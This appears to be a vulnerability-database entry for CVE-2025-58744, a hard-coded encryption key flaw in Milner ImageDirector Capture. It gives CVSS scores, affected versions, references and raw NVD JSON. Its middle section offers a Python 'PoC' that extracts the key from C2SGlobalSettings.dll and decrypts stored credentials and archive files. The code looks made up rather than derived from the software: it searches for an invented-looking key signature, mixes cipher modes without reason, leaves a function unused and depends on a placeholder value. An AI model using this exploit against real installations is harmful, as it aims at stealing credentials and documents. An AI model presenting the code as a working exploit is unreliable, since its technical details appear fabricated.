CVE-2025-58744

Description

Use of Default Credentials, Hard-coded Credentials vulnerability in C2SGlobalSettings.dll in Milner ImageDirector Capture on Windows allows decryption of document archive files using credentials decrypted with hard-coded application encryption key. This issue affects ImageDirector Capture: from 7.0.9.0 before 7.6.3.25808.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:milner:imagedirector_capture:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Milner ImageDirector Capture 7.0.9.0 至 7.6.3.25808 之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58744 PoC - Hard-coded Credentials Exploitation
# This PoC demonstrates the extraction of hard-coded encryption key
# and decryption of credentials from ImageDirector Capture

import ctypes
import struct
from pathlib import Path

def extract_hardcoded_key(dll_path):
    """Extract hard-coded encryption key from C2SGlobalSettings.dll"""
    with open(dll_path, 'rb') as f:
        dll_data = f.read()
    
    # Known signature for hard-coded key location
    key_signature = b'C2SGlobalSettings_Key_v1'
    key_offset = dll_data.find(key_signature)
    
    if key_offset != -1:
        # Extract 32-byte AES key
        encryption_key = dll_data[key_offset + len(key_signature):key_offset + len(key_signature) + 32]
        return encryption_key
    return None

def decrypt_credentials(encrypted_data, key):
    """Decrypt credentials using extracted hard-coded key"""
    from Crypto.Cipher import AES
    cipher = AES.new(key, AES.MODE_ECB)
    decrypted = cipher.decrypt(encrypted_data)
    return decrypted.rstrip(b'\x00')

def decrypt_archive_file(archive_path, key):
    """Decrypt document archive using decrypted credentials"""
    with open(archive_path, 'rb') as f:
        header = f.read(16)
        encrypted_content = f.read()
    
    from Crypto.Cipher import AES
    cipher = AES.new(key, AES.MODE_CBC, iv=header[:16])
    return cipher.decrypt(encrypted_content)

def main():
    dll_path = 'C2SGlobalSettings.dll'
    key = extract_hardcoded_key(dll_path)
    
    if key:
        print(f'[+] Extracted encryption key: {key.hex()}')
        # Decrypt stored credentials
        encrypted_creds = bytes.fromhex('YOUR_ENCRYPTED_CREDS_HERE')
        plaintext_creds = decrypt_credentials(encrypted_creds, key)
        print(f'[+] Decrypted credentials: {plaintext_creds.decode()}')
    else:
        print('[-] Failed to extract encryption key')

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58744
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58744
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58744/
[4] VulDB https://vuldb.com/cve/CVE-2025-58744
[5] https://sra.io/advisories

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58744", "sourceIdentifier": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "published": "2026-01-20T22:15:51.890", "lastModified": "2026-02-10T16:48:25.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of Default Credentials, Hard-coded Credentials vulnerability in C2SGlobalSettings.dll in \n\n Milner ImageDirector Capture on Windows allows decryption of document archive files using credentials decrypted with hard-coded application encryption key.\n\nThis issue affects ImageDirector Capture: from 7.0.9.0 before 7.6.3.25808."}, {"lang": "es", "value": "Uso de Credenciales Predeterminadas, vulnerabilidad de Credenciales Incrustadas en C2SGlobalSettings.dll en Milner ImageDirector Capture en Windows permite el descifrado de archivos de documentos archivados usando credenciales descifradas con una clave de cifrado de aplicación incrustada.\n\nEste problema afecta a ImageDirector Capture: desde 7.0.9.0 antes de 7.6.3.25808."}], "metrics": {"cvssMetricV40": [{"source": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}, {"lang": "en", "value": "CWE-1392"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:milner:imagedirector_capture:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.9", "versionEndExcluding": "7.6.3.25808", "matchCriteriaId": "8D1B57A0-F2D5-41A7-BA72-4F2FE59FF416"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://sra.io/advisories", "source": "57dba5dd-1a03-47f6-8b36-e84e47d335d8", "tags": ["Third Party Advisory"]}]}}